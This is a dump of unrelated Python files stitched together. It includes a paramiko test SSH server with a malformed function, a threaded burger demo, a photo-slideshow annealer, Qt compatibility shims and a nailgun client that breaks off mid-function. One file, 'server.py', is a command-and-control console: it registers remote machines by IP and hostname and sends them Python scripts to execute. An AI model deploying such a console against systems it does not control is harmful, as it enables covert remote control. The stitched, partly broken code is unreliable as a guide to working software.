if username == 'pkey2fa' and key == self.good_pub_key:
self.key_verified = True
return paramiko.AUTH_PARTIALLY_SUCCESSFUL
return paramiko.AUTH_FAILED
def check_auth_interactive(self, username, submethods):
if username in ['pass2fa', 'pkey2fa']:
self.username = username
prompt = 'Verification code: ' if self.password_verified else 'Password: ' # noqa
print(username, prompt)
return paramiko.InteractiveQuery('', '', prompt)
return paramiko.AUTH_FAILED
def check_auth_interactive_response(self, responses):
if self.username in ['pass2fa', 'pkey2fa']:
if not self.password_verified:
if responses[0] == 'password':
print('password verified')
self.password_verified = True
if self.username == 'pkey2fa':
return self.check_auth_interactive(self.username, '')
else:
print('wrong password: {}'.format(responses[0]))
return paramiko.AUTH_FAILED
else:
if responses[0] == 'passcode':
print('totp verified')
return paramiko.AUTH_SUCCESSFUL
else:
print('wrong totp: {}'.format(responses[0]))
return paramiko.AUTH_FAILED
else:
return paramiko.AUTH_FAILED
def get_allowed_auths(self, username):
if username == 'keyonly':
return 'publickey'
if username == 'pass2fa':
return 'keyboard-interactive'
if username == 'pkey2fa':
if not self.key_verified:
return 'publickey'
else:
return 'keyboard-interactive'
return 'password,publickey'
def check_channel_exec_request(self, channel, command):
if command != b'locale charmap':
ret = False
else:
ret = True
channel.send(self.encoding)
channel.shutdown(1)
self.exec_event.set()
return ret
def check_channel_shell_request(self, channel):
self.shell_event.set()
return True
def check_channel_pty_request(self, channel, term, width, height,
pixelwidth, pixelheight, modes):
return True
def check_channel_window_change_request(self, channel, width, height,
pixelwidth, pixelheight):
channel.send('resized')
return True
def sshServer_run(gsServer):
def __init__(self,**kwargv):
self.cfg=edict()
self.cfg.host=kwargv["host"]
self.cfg.port=kwargv["port"]
self.cfg.prototype="tcp"
self.cfg.datamodel="bin"
gsServer.__init__(self,self.cfg)
self.running=True
threading.Thread(target=self.run).start()
def run(self):
while self.running:
if self.quesocket.empty()==False:
printf('Got a connection!')
client=self.quesocket.get()
t = paramiko.Transport(client.dev)
t.load_server_moduli()
t.add_server_key(host_key)
server = Server()
try:
t.start_server(server=server)
except Exception as e:
print(e)
continue
# wait for auth
chan = t.accept(2)
if chan is None:
print('*** No channel.')
continue
username = t.get_username()
print('{} Authenticated!'.format(username))
server.shell_event.wait(timeout=event_timeout)
if not server.shell_event.is_set():
print('*** Client never asked for a shell.')
continue
server.exec_event.wait(timeout=event_timeout)
if not server.exec_event.is_set():
print('*** Client never asked for a command.')
continue
# chan.send('\r\n\r\nWelcome!\r\n\r\n')
print(server.encoding)
chan.send(banner.encode(server.encoding.strip()))
if username == 'bar':
msg = chan.recv(1024)
chan.send(msg)
elif username == 'foo':
lst = []
while True:
msg = chan.recv(32 * 1024)
lst.append(msg)
if msg.endswith(b'\r\n\r\n'):
break
data = b''.join(lst)
while data:
s = chan.send(data)
data = data[s:]
else:
chan.close()
t.close()
client.Close()
try:self.close()
except Exception:pass
else:pass
def run_ssh_server(port=2200, running=True):
# now connect
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', port))
sock.listen(100)
while running:
client, addr = sock.accept()
print('Got a connection!')
t = paramiko.Transport(client)
t.load_server_moduli()
t.add_server_key(host_key)
server = Server()
try:
t.start_server(server=server)
except Exception as e:
print(e)
continue
# wait for auth
chan = t.accept(2)
if chan is None:
print('*** No channel.')
continue
username = t.get_username()
print('{} Authenticated!'.format(username))
server.shell_event.wait(timeout=event_timeout)
if not server.shell_event.is_set():
print('*** Client never asked for a shell.')
continue
server.exec_event.wait(timeout=event_timeout)
if not server.exec_event.is_set():
print('*** Client never asked for a command.')
continue
# chan.send('\r\n\r\nWelcome!\r\n\r\n')
print(server.encoding)
chan.send(banner.encode(server.encoding.strip()))
if username == 'bar':
msg = chan.recv(1024)
chan.send(msg)
elif username == 'foo':
lst = []
while True:
msg = chan.recv(32 * 1024)
lst.append(msg)
if msg.endswith(b'\r\n\r\n'):
break
data = b''.join(lst)
while data:
s = chan.send(data)
data = data[s:]
else:
chan.close()
t.close()
client.close()
try:sock.close()
except Exception:pass
if __name__ == '__main__':
run_ssh_server()
|
03-locking_restaurant.py
|
import time
import sys
from threading import Thread, Lock
from kitchen import Kitchen, Grill, CuttingBoard, Pantry
from burgers import Burger
from utils import (
ingredients_list_from_recipe,
prepare_ingerdient,
flat_generator,
select_ingredients,
gather_ingredients,
)
RECIPES = {
"cheeseburger": [
"bun-bottom",
"lettuce-slice",
"onion-ring",
"tomato-slice",
"grilled-beefpatty",
"cheese-slice",
"bun-top",
]
}
class LockingCuttingBoard(CuttingBoard):
def __init__(self, lock, *args, **kwargs):
super().__init__(*args, **kwargs)
self.lock = lock
def use(self, *args, **kwargs):
with self.lock:
return super().use(*args, **kwargs)
class LockingGrill(Grill):
def __init__(self, lock, *args, **kwargs):
super().__init__(*args, **kwargs)
self.lock = lock
def use(self, *args, **kwargs):
with self.lock:
return super().use(*args, **kwargs)
class LockingKitchen(Kitchen):
def __init__(self):
self.pantry = Pantry()
self.cutting_board = LockingCuttingBoard(Lock())
self.grill = LockingGrill(Lock())
kitchen = LockingKitchen()
results = []
def make_burger(order):
recipe = RECIPES[order]
ingredients_list = ingredients_list_from_recipe(recipe)
ingredients = gather_ingredients(ingredients_list, kitchen.pantry)
prepared_ingredients = [prepare_ingerdient(ingredient, kitchen) for ingredient in ingredients]
prepared_ingredients = list(flat_generator(prepared_ingredients))
results.append(Burger(order, select_ingredients(recipe, prepared_ingredients)))
if __name__ == "__main__":
multiplier = int(sys.argv[2]) if len(sys.argv) > 2 else 1
orders = multiplier * sys.argv[1].split(",")
threads = []
start_time = time.time()
for order in orders:
t = Thread(target=make_burger, args=(order,))
t.start()
threads.append(t)
for t in threads:
t.join()
for burger in results:
burger.taste(RECIPES[order])
print(f"You can eat your delicious '{burger}'")
print(f"Delivered {len(orders)} burgers in {time.time()-start_time}s")
|
run.py
|
#!/usr/bin/env python3
import sys
import argparse
import multiprocessing
import random
from dataclasses import dataclass
from threading import Thread, Lock
from typing import List, Set, Optional
import simanneal
import myio
lock = Lock()
photos = []
vertical_photos = []
horizontal_photos = []
best = -1
def delta_for_swap(sol, a, b):
if a > b:
a, b = b, a
previous = 0
next = 0
if a > 0:
previous += transition_score(sol[a - 1], sol[a])
next += transition_score(sol[a - 1], sol[b])
if a < len(sol) - 1:
previous += transition_score(sol[a], sol[a + 1])
next += transition_score(sol[b], sol[a + 1])
if b > 0:
previous += transition_score(sol[b - 1], sol[b])
next += transition_score(sol[b - 1], sol[a])
if b < len(sol) - 1:
previous += transition_score(sol[b], sol[b + 1])
next += transition_score(sol[a], sol[b + 1])
return next - previous
class AnnealIt(simanneal.Annealer):
def __init__(self, id, state, score: int):
super().__init__(state)
self.id = str(id)
print(f"Thread {self.id} building the annealer")
self.copy_strategy = 'method'
self.steps = 42 # TODO: asd
self.step = 0
self.current_obj = score
print(f"Thread {self.id}: Score before annealing = {self.current_obj}, annealing begins")
def move(self):
self.step += 1
#for i in range(1, int((float(len(self.state))) * (1.0 - self.step/self.steps))):
a = random.randint(0, len(self.state) - 1)
b = random.randint(0, len(self.state) - 1)
while b == a:
b = random.randint(0, len(self.state) - 1)
delta = delta_for_swap(self.state, a, b)
self.current_obj += delta
self.state[a], self.state[b] = self.state[b], self.state[a]
def energy(self):
return -self.current_obj
def compute_it(id, output_file: str):
# global vertical_photos
global best
v = vertical_photos.copy()
h = horizontal_photos.copy()
iv = 0
ih = 0
local_random = random.Random()
seeeeeeeeed = random.randint(0, sys.maxsize) + (id*100)**3
local_random.seed(seeeeeeeeed)
print(f"Thread {str(id)} has seed {str(seeeeeeeeed)}")
local_random.shuffle(v)
local_random.shuffle(h)
print(f"Thread {str(id)}: shuffled")
x0 = []
vmax = len(v) - (len(v) % 2)
while iv < vmax or ih < len(h):
if iv < vmax:
slide = Slide(v[iv], v[iv + 1])
iv += 2
x0.append(slide)
if ih < len(h):
slide = Slide(h[ih])
ih += 1
x0.append(slide)
print(f"Thread {str(id)}: x0 ready")
score = objective(x0)
print(f"Thread {str(id)}: score for x0 ready")
# annealer = AnnealIt(id, x0, score)
# auto_schedule = annealer.auto(minutes=0.2)
score = local_search(x0, score)
local_best = x0
for i in range(0, 3):
annealer = AnnealIt(id, local_best, score)
# annealer.set_schedule(auto_schedule)
local_best, score = annealer.anneal()
score = -score
print(f"Thread {str(id)}: Annealed it! {score}")
prev_score = score
score = local_search(local_best, score)
if score > best:
lock.acquire()
if score > best:
print(f"New best by {str(id)}: {str(score)}")
best = score
write_output(output_file, local_best)
lock.release()
else:
lock.release()
print(f"Thread {str(id)}: worse, {score} < {best}")
else:
print(f"Thread {str(id)}: worse, {score} < {best}")
if prev_score == score:
print("Giving up")
break
# COMPUTE IT
# for x in sorted(listone, key=lambda el: el.cose, reverse=True)
def main(input_file: str, output_file: str):
file_lines = myio.read(input_file)
nlines = int(file_lines[0])
for i, line in enumerate(file_lines[1:]):
pieces = line.split(' ')
photo = Foto(i, pieces[0], pieces[1], set(pieces[2:]))
photos.append(photo)
if photo.is_vertical():
vertical_photos.append(photo)
else:
horizontal_photos.append(photo)
workers = []
for i in range(0, multiprocessing.cpu_count()):
workers.append(Thread(target=compute_it, args=(i, output_file)))
workers[-1].start()
for worker in workers:
# Workers of the world, unite!
worker.join()
# compute_it(-1, output_file)
@dataclass
class Foto:
id: int
orientation: str
n_tags: int
tags: Set[str]
def is_vertical(self):
return self.orientation == 'V'
class Slide:
def __init__(self, first: Foto, second: Optional[Foto]=None):
self.photo1 = first
self.photo2 = second
if self.photo2 is None:
self.tags = self.photo1.tags
self.vertical = False
else:
if self.photo1.id > self.photo2.id: # swap swap swap
self.photo1, self.photo2 = self.photo2, self.photo1
self.tags = self.photo1.tags.union(self.photo2.tags)
self.vertical = True
def ids(self):
if self.vertical:
return f"{str(self.photo1.id)} {str(self.photo2.id)}"
else:
return str(self.photo1.id)
def local_search(sol: List[Slide], current_obj: int) -> int:
prev_obj = current_obj
tot = len(sol)
for i in range(1, tot):
j = i - 1
delta = delta_for_swap(sol, j, i)
if delta > 0:
current_obj += delta
sol[i - 1], sol[i] = sol[i], sol[i - 1]
print(f"Local search done: from {prev_obj} to {current_obj}")
return current_obj
def write_output(output_file, slides: List[Slide]):
# noinspection PyListCreation
file_lines = []
file_lines.append(str(len(slides)))
for slide in slides:
file_lines.append(slide.ids())
myio.write(output_file, file_lines)
def transition_score(first: Slide, second: Slide):
n1 = len(first.tags.intersection(second.tags))
n2 = len(first.tags.difference(second.tags))
n3 = len(second.tags.difference(first.tags))
return min(n1, n2, n3)
def objective(sol: List[Slide]):
if len(sol) == 0:
return 0
score = 0
for i in range(0, len(sol) - 1):
score += transition_score(sol[i], sol[i+1])
#print(f"Nice score, dude: {str(score)}")
return score
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Do awesome computations, yeha.')
parser.add_argument('input', type=str, help="Input file name")
parser.add_argument('output', type=str, help="Output file name")
args = parser.parse_args()
main(args.input, args.output)
|
server.py
|
import asyncio
import websockets
import threading
import queue
import glob
import json
import time
import sys
import os
SOCKETS = []
PORT = 8765
async def handle_conn(websocket, path):
data = json.loads(await websocket.recv())
sys_info = data.copy()
sys_info["id"] = len(SOCKETS)
sys_info["alive"] = True
sys_info["ip"] = websocket.remote_address[0]
nick = "{}/{}/{}".format(sys_info["ip"], sys_info["hostname"], sys_info["id"])
sys_info["nick"] = nick
system = (websocket, sys_info)
SOCKETS.append(system)
try:
async for message in websocket:
try:
msg = json.loads(message)
if msg.get("result"):
result = msg["result"]
print(f"\n[{nick}] {result}\n")
if msg.get("error"):
error = msg["error"]
print(f"\n[{nick}] {error}\n")
except Exception as e:
print(e)
except:
system[1]["alive"] = False
def start_server_async():
def _start():
asyncio.set_event_loop(asyncio.new_event_loop())
start_server = websockets.serve(handle_conn, "0.0.0.0", PORT)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
thread = threading.Thread(target=_start)
thread.start()
def _parse_cmd(cmd):
if "(" in cmd and ")" in cmd:
args_idx = cmd.index("(")
method = cmd[:args_idx]
args = eval(cmd[args_idx:])
if type(args) != tuple:
args = (args,)
elif " " in cmd:
cmd_split = cmd.split(" ")
method = cmd_split[0]
args = (eval(cmd_split[1]),)
else:
method = cmd
args = tuple()
return method, args
def create_script_payload(script_name):
script_fn = os.path.join("scripts", script_name + ".py")
with open(script_fn, "r") as f:
script = f.read()
init_method = f"main_{script_name}_{time.time()}".replace(".", "")
script = script.replace("def main(", f"def {init_method}(")
return init_method, script
def send_async(socket, data):
async def _send():
await socket.send(data)
asyncio.get_event_loop().run_until_complete(_send())
def handle_cmd(sys_idx, method, params):
if method == "exit":
sys.exit(0)
elif method in ["list", "ls"]:
for i, (_, sys_info) in enumerate(SOCKETS):
if sys_info["alive"]:
print(i, sys_info["nick"])
elif method in ["interact", "i"]:
if len(params) == 0 or params[0] < 0 or params[0] >= len(SOCKETS):
sys_idx = -1
else:
sys_idx = params[0]
elif method == "scripts":
for fn in glob.iglob("scripts/*.py"):
script_name = os.path.basename(fn)[:-3]
print(script_name)
elif method == "info":
print(SOCKETS[sys_idx][1])
elif method == "nick":
SOCKETS[sys_idx][1]["nick"] = params[0]
elif sys_idx != -1:
init_method, script = create_script_payload(method)
send_async(SOCKETS[sys_idx][0], json.dumps({"script": script, "init_method": init_method, "args": params}))
return sys_idx
def run_interactive():
sys_idx = -1
while True:
prompt = " > "
if sys_idx != -1:
nick = SOCKETS[sys_idx][1]["nick"]
prompt = f"[{nick}] >> "
cmd = input(prompt)
if cmd.strip() == "":
continue
try:
method, params = _parse_cmd(cmd)
sys_idx = handle_cmd(sys_idx, method, params)
except Exception as e:
print(e)
continue
if __name__ == "__main__":
start_server_async()
run_interactive()
|
qsatype.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import datetime, weakref
from PyQt4 import QtCore, QtGui
# Cargar toda la API de Qt para que sea visible.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from pineboolib import qsaglobals
from pineboolib import flcontrols
from pineboolib.fllegacy import FLFormSearchDB as FLFormSearchDB_legacy
from pineboolib.flcontrols import FLTable, FLReportViewer, QLineEdit
from pineboolib.fllegacy import FLSqlQuery as FLSqlQuery_Legacy
from pineboolib.fllegacy import FLSqlCursor as FLSqlCursor_Legacy
from pineboolib.fllegacy import FLTableDB as FLTableDB_Legacy
from pineboolib.fllegacy import FLUtil as FLUtil_Legacy
from pineboolib import decorators
import traceback
class StructMyDict(dict):
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError(e)
def __setattr__(self, name, value):
self[name] = value
def Function(args, source):
# Leer código QS embebido en Source
# asumir que es una funcion anónima, tal que:
# -> function($args) { source }
# compilar la funcion y devolver el puntero
qs_source = """
function anon(%s) {
%s
} """ % (args,source)
print("Compilando QS en línea: ", qs_source)
from pineboolib.flparser import flscriptparse
from pineboolib.flparser import postparse
from pineboolib.flparser.pytnyzer import write_python_file, string_template
import io
prog = flscriptparse.parse(qs_source)
tree_data = flscriptparse.calctree(prog, alias_mode = 0)
ast = postparse.post_parse(tree_data)
tpl = string_template
f1 = io.StringIO()
write_python_file(f1,ast,tpl)
pyprog = f1.getvalue()
print("Resultado: ", pyprog)
glob = {}
loc = {}
exec(pyprog, glob, loc)
# ... y lo peor es que funciona. W-T-F.
return loc["anon"]
def Object(x=None):
if x is None: x = {}
return StructMyDict(x)
def Array(x=None):
try:
if x is None: return {}
else: return list(x)
except TypeError:
return [x]
def Boolean(x=False): return bool(x)
def FLSqlQuery(*args):
#if not args: return None
return FLSqlQuery_Legacy.FLSqlQuery(*args)
def FLUtil(*args):
return FLUtil_Legacy.FLUtil(*args)
def AQUtil(*args):
return FLUtil_Legacy.FLUtil(*args)
def FLSqlCursor(action=None):
if action is None: return None
return FLSqlCursor_Legacy.FLSqlCursor(action)
def FLTableDB(*args):
if not args: return None
return FLTableDB_Legacy.FLTableDB(*args)
FLListViewItem = QtGui.QListView
QTable = FLTable
Color = QtGui.QColor
QColor = QtGui.QColor
QDateEdit = QtGui.QDateEdit
File = QtCore.QFile
@decorators.NotImplementedWarn
def FLPosPrinter(*args, **kwargs):
class flposprinter:
pass
return flposprinter()
@decorators.NotImplementedWarn
def FLDomDocument(*args, **kwargs):
class fldomdocument:
pass
return fldomdocument()
@decorators.NotImplementedWarn
def FLCodBar(*args, **kwargs):
class flcodbar:
def nameToType(self, name):
return name
def pixmapError(self):
return QtGui.QPixmap()
def pixmap(self):
return QtGui.QPixmap()
def validBarcode(self):
return None
return flcodbar()
def print_stack(maxsize=1):
for tb in traceback.format_list(traceback.extract_stack())[1:-2][-maxsize:]:
print(tb.rstrip())
def check_gc_referrers(typename, w_obj, name):
import threading, time
def checkfn():
import gc
time.sleep(2)
gc.collect()
obj = w_obj()
if not obj: return
# TODO: Si ves el mensaje a continuación significa que "algo" ha dejado
# ..... alguna referencia a un formulario (o similar) que impide que se destruya
# ..... cuando se deja de usar. Causando que los connects no se destruyan tampoco
# ..... y que se llamen referenciando al código antiguo y fallando.
print("HINT: Objetos referenciando %r::%r (%r) :" % (typename, obj, name))
for ref in gc.get_referrers(obj):
if isinstance(ref, dict):
x = []
for k,v in ref.items():
if v is obj:
k = "(**)" + k
x.insert(0,k)
else:
x.append(k)
print(" - ", repr(x[:48]))
else:
if "<frame" in str(repr(ref)): continue
print(" - ", repr(ref))
threading.Thread(target = checkfn).start()
class FormDBWidget(QtGui.QWidget):
def __init__(self, action, project, parent = None):
super(FormDBWidget, self).__init__(parent)
self._action = action
self.cursor_ = FLSqlCursor(action.name)
self._prj = project
self._class_init()
def __del__(self):
print("FormDBWidget: Borrando form para accion %r" % self._action.name)
def _class_init(self):
pass
def closeEvent(self, event):
can_exit = True
print("FormDBWidget: closeEvent para accion %r" % self._action.name)
check_gc_referrers("FormDBWidget:"+self.__class__.__name__, weakref.ref(self), self._action.name)
if hasattr(self, 'iface'):
check_gc_referrers("FormDBWidget.iface:"+self.iface.__class__.__name__, weakref.ref(self.iface), self._action.name)
del self.iface.ctx
del self.iface
if can_exit:
event.accept() # let the window close
else:
event.ignore()
def child(self, childName):
try:
ret = self.findChild(QtGui.QWidget, childName)
except RuntimeError as rte:
# FIXME: A veces intentan buscar un control que ya está siendo eliminado.
# ... por lo que parece, al hacer el close del formulario no se desconectan sus señales.
print("ERROR: Al buscar el control %r encontramos el error %r" % (childName,rte))
print_stack(8)
import gc
gc.collect()
print("HINT: Objetos referenciando FormDBWidget::%r (%r) : %r" % (self, self._action.name, gc.get_referrers(self)))
if hasattr(self, 'iface'):
print("HINT: Objetos referenciando FormDBWidget.iface::%r : %r" % (self.iface, gc.get_referrers(self.iface)))
ret = None
else:
if ret is None:
print("WARN: No se encontró el control %r" % childName)
#else:
# print("DEBUG: Encontrado el control %r: %r" % (childName, ret))
return ret
def cursor(self):
cursor = None
try:
if self.parentWidget():
cursor = getattr(self.parentWidget(),"cursor_", None)
if cursor:
del self.cursor_
self.cursor_ = cursor
except Exception:
# FIXME: A veces parentWidget existía pero fue eliminado. Da un error
# ... en principio debería ser seguro omitir el error.
pass
return self.cursor_
def FLFormSearchDB(name):
widget = FLFormSearchDB_legacy.FLFormSearchDB(name)
widget.setWindowModality(QtCore.Qt.ApplicationModal)
return widget
class Date(QtCore.QDate):
pass
class Dialog(QtGui.QDialog):
_layout = None
def __init__(self, title, f):
#FIXME: f no lo uso , es qt.windowsflg
super(Dialog, self).__init__()
self.setWindowTitle(title)
self.setWindowModality(QtCore.Qt.ApplicationModal)
self._layout = QtGui.QVBoxLayout()
self.setLayout(self._layout)
def add(self, _object):
self._layout.addWidget(_object)
class GroupBox(QtGui.QGroupBox):
pass
class CheckBox(QtGui.QCheckBox):
pass
|
ng.py
|
#!/usr/bin/env python
#
# Copyright 2004-2015, Martian Software, Inc.
# Copyright 2017-Present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import ctypes
import platform
import optparse
import os
import os.path
import select
import socket
import struct
import sys
import time
from io import BytesIO
from threading import Condition, Event, Thread, RLock
is_py2 = sys.version_info[0] == 2
if is_py2:
import Queue as Queue
import __builtin__ as builtin
def to_bytes(s):
return s
else:
import queue as Queue
import builtins as builtin
from io import UnsupportedOperation
def to_bytes(s):
return bytes(s, "utf-8")
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
# @author <a href="http://www.martiansoftware.com/contact.html">Marty Lamb</a>
# @author Pete Kirkham (Win32 port)
# @author Sergey Balabanov, Ben Hamilton (Python port)
#
# Please try to keep this working on Python 2.6.
NAILGUN_VERSION = "1.0.0"
BUFSIZE = 2048
NAILGUN_PORT_DEFAULT = 2113
CHUNK_HEADER_LEN = 5
THREAD_TERMINATION_TIMEOUT_SEC = 0.5
STDIN_BUFFER_LINE_SIZE = 10
CHUNKTYPE_STDIN = b"0"
CHUNKTYPE_STDOUT = b"1"
CHUNKTYPE_STDERR = b"2"
CHUNKTYPE_STDIN_EOF = b"."
CHUNKTYPE_ARG = b"A"
CHUNKTYPE_LONGARG = b"L"
CHUNKTYPE_ENV = b"E"
CHUNKTYPE_DIR = b"D"
CHUNKTYPE_CMD = b"C"
CHUNKTYPE_EXIT = b"X"
CHUNKTYPE_SENDINPUT = b"S"
CHUNKTYPE_HEARTBEAT = b"H"
NSEC_PER_SEC = 1000000000
DEFAULT_HEARTBEAT_INTERVAL_SEC = 0.5
SELECT_MAX_BLOCK_TIME_SEC = 1.0
SEND_THREAD_WAIT_TERMINATION_SEC = 5.0
# We need to support Python 2.6 hosts which lack memoryview().
HAS_MEMORYVIEW = "memoryview" in dir(builtin)
EVENT_STDIN_CHUNK = 0
EVENT_STDIN_CLOSED = 1
EVENT_STDIN_EXCEPTION = 2
def compat_memoryview_py2(buf):
return memoryview(buf)
def compat_memoryview_py3(buf):
return memoryview(buf).cast("c")
# memoryview in python3, while wrapping ctypes.create_string_buffer has problems with
# that type's default format (<c) and assignment operators. For python3, cast to
# a 'c' array. Little endian single byte doesn't make sense anyways. However,
# 'cast' does not exist for python2. So, we have to toggle a bit.
compat_memoryview = compat_memoryview_py2 if is_py2 else compat_memoryview_py3
class NailgunException(Exception):
SOCKET_FAILED = 231
CONNECT_FAILED = 230
UNEXPECTED_CHUNKTYPE = 229
CONNECTION_BROKEN = 227
def __init__(self, message, code):
self.message = message
self.code = code
def __str__(self):
return self.message
class Transport(object):
def close(self):
raise NotImplementedError()
def sendall(self, data):
raise NotImplementedError()
def recv(self, size):
raise NotImplementedError()
def recv_into(self, buffer, size=None):
raise NotImplementedError()
def select(self, timeout_secs):
raise NotImplementedError()
class UnixTransport(Transport):
def __init__(self, __socket):
self.__socket = __socket
self.recv_flags = 0
self.send_flags = 0
if hasattr(socket, "MSG_WAITALL"):
self.recv_flags |= socket.MSG_WAITALL
if hasattr(socket, "MSG_NOSIGNAL"):
self.send_flags |= socket.MSG_NOSIGNAL
def close(self):
return self.__socket.close()
def sendall(self, data):
result = self.__socket.sendall(data, self.send_flags)
return result
def recv(self, nbytes):
return self.__socket.recv(nbytes, self.recv_flags)
def recv_into(self, buffer, nbytes=None):
return self.__socket.recv_into(buffer, nbytes, self.recv_flags)
def select(self, timeout_secs):
select_list = [self.__socket]
readable, _, exceptional = select.select(
select_list, [], select_list, timeout_secs
)
return (self.__socket in readable), (self.__socket in exceptional)
if os.name == "nt":
import ctypes.wintypes
wintypes = ctypes.wintypes
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_FLAG_OVERLAPPED = 0x40000000
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
WAIT_FAILED = 0xFFFFFFFF
WAIT_TIMEOUT = 0x00000102
WAIT_OBJECT_0 = 0x00000000
WAIT_IO_COMPLETION = 0x000000C0
INFINITE = 0xFFFFFFFF
# Overlapped I/O operation is in progress. (997)
ERROR_IO_PENDING = 0x000003E5
ERROR_PIPE_BUSY = 231
# No process is on the other end of the pipe error on Windows
ERROR_NO_PROCESS_ON_OTHER_END_OF_PIPE = 233
# The pointer size follows the architecture
# We use WPARAM since this type is already conditionally defined
ULONG_PTR = ctypes.wintypes.WPARAM
class OVERLAPPED(ctypes.Structure):
_fields_ = [
("Internal", ULONG_PTR),
("InternalHigh", ULONG_PTR),
("Offset", wintypes.DWORD),
("OffsetHigh", wintypes.DWORD),
("hEvent", wintypes.HANDLE),
]
LPDWORD = ctypes.POINTER(wintypes.DWORD)
CreateFile = ctypes.windll.kernel32.CreateFileW
CreateFile.argtypes = [
wintypes.LPCWSTR,
wintypes.DWORD,
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.HANDLE,
]
CreateFile.restype = wintypes.HANDLE
CloseHandle = ctypes.windll.kernel32.CloseHandle
CloseHandle.argtypes = [wintypes.HANDLE]
CloseHandle.restype = wintypes.BOOL
ReadFile = ctypes.windll.kernel32.ReadFile
ReadFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
ReadFile.restype = wintypes.BOOL
WriteFile = ctypes.windll.kernel32.WriteFile
WriteFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
WriteFile.restype = wintypes.BOOL
GetLastError = ctypes.windll.kernel32.GetLastError
GetLastError.argtypes = []
GetLastError.restype = wintypes.DWORD
SetLastError = ctypes.windll.kernel32.SetLastError
SetLastError.argtypes = [wintypes.DWORD]
SetLastError.restype = None
FormatMessage = ctypes.windll.kernel32.FormatMessageW
FormatMessage.argtypes = [
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
ctypes.POINTER(wintypes.LPCWSTR),
wintypes.DWORD,
wintypes.LPVOID,
]
FormatMessage.restype = wintypes.DWORD
LocalFree = ctypes.windll.kernel32.LocalFree
GetOverlappedResult = ctypes.windll.kernel32.GetOverlappedResult
GetOverlappedResult.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(OVERLAPPED),
LPDWORD,
wintypes.BOOL,
]
GetOverlappedResult.restype = wintypes.BOOL
CreateEvent = ctypes.windll.kernel32.CreateEventW
CreateEvent.argtypes = [LPDWORD, wintypes.BOOL, wintypes.BOOL, wintypes.LPCWSTR]
CreateEvent.restype = wintypes.HANDLE
PeekNamedPipe = ctypes.windll.kernel32.PeekNamedPipe
PeekNamedPipe.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
LPDWORD,
LPDWORD,
]
PeekNamedPipe.restype = wintypes.BOOL
WaitNamedPipe = ctypes.windll.kernel32.WaitNamedPipeW
WaitNamedPipe.argtypes = [wintypes.LPCWSTR, wintypes.DWORD]
WaitNamedPipe.restype = wintypes.BOOL
def _win32_strerror(err):
""" expand a win32 error code into a human readable message """
# FormatMessage will allocate memory and assign it here
buf = ctypes.c_wchar_p()
FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM
| FORMAT_MESSAGE_ALLOCATE_BUFFER
| FORMAT_MESSAGE_IGNORE_INSERTS,
None,
err,
0,
buf,
0,
None,
)
try:
return buf.value
finally:
LocalFree(buf)
class WindowsNamedPipeTransport(Transport):
""" connect to a named pipe """
def __init__(self, sockpath):
self.sockpath = u"\\\\.\\pipe\\{0}".format(sockpath)
while True:
self.pipe = CreateFile(
self.sockpath,
GENERIC_READ | GENERIC_WRITE,
0,
None,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
None,
)
err1 = GetLastError()
msg = _win32_strerror(err1)
if self.pipe != INVALID_HANDLE_VALUE:
break
if err1 != ERROR_PIPE_BUSY:
self.pipe = None
raise NailgunException(msg, NailgunException.CONNECT_FAILED)
if not WaitNamedPipe(self.sockpath, 5000):
self.pipe = None
raise NailgunException(
"time out while waiting for a pipe", NailgunException.CONNECT_FAILED
)
# event for the overlapped I/O operations
self.read_waitable = CreateEvent(None, True, False, None)
if self.read_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
self.write_waitable = CreateEvent(None, True, False, None)
if self.write_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
def _raise_win_err(self, msg, err):
raise IOError("%s win32 error code: %d %s" % (msg, err, _win32_strerror(err)))
def close(self):
if self.pipe:
CloseHandle(self.pipe)
self.pipe = None
if self.read_waitable is not None:
CloseHandle(self.read_waitable)
self.read_waitable = None
if self.write_waitable is not None:
CloseHandle(self.write_waitable)
self.write_waitable = None
def recv_into(self, buffer, nbytes):
# we don't use memoryview because OVERLAPPED I/O happens
# after the method (ReadFile) returns
buf = ctypes.create_string_buffer(nbytes)
olap = OVERLAPPED()
olap.hEvent = self.read_waitable
immediate = ReadFile(self.pipe, buf, nbytes, None, olap)
err = GetLastError()
if err == ERROR_NO_PROCESS_ON_OTHER_END_OF_PIPE:
raise NailgunException(
"No process on the other end of pipe",
